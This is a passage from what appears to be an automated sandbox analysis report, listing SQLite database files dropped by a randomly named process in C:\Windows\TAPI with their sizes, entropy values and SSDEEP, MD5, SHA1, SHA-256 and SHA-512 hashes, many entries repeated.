                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
